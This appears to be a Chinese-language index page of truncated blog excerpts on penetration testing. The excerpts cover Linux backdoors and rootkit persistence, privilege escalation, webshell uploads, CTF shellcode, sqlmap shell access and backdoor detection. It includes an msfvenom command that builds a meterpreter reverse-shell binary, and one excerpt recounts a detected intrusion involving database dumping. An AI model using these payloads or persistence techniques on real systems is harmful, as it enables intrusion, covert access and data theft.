在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux维持权限，经过此次事后从Google找各种资料，一款满意的rootkit都没有，现在一直在关注这方面，但还是没有找到满意的后门，在渗透圈一个人的资源总是有限往往你全力追求 ...

在渗透测试过程中，提升权限是非常关键的一步，攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点，来达到提升权限的目的。 1、内核漏洞提权 提起内核漏洞提 ...

目录 ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp ...

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf ...

配置文件排查： 　　文件属性：stat /etc/rc.local 　　文件配置：cat /etc/fstab 　　文件内容：grep -V '#' /etc/bashrc | more 　　文件目录：ls -last /etc/profile.d/ cron后门排查： 　　配置文件 ...

记录一下文件上传的常见姿势，更全面的可以做upload-labs。 实验环境：win2003 phpstudy 实验平台：upfile 一、准备上传的一句话木马 eval函数将接受的字符串当做代码执行 二、实验步骤 2.1 无防护上传 可以直接上传一句话木马 ...

今天开始在做hitcon-training的题目，做到lab2就发现了自己的知识盲区，遇到无法执行shell的情况，需要自己打shellcode执行cat flag 操作 经过一系列的搜索，发现了几种编写shellcode的方法 ...

windows提权 1.通过sqlmap连接mysql获取shell （1）直接连接数据库 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/my ...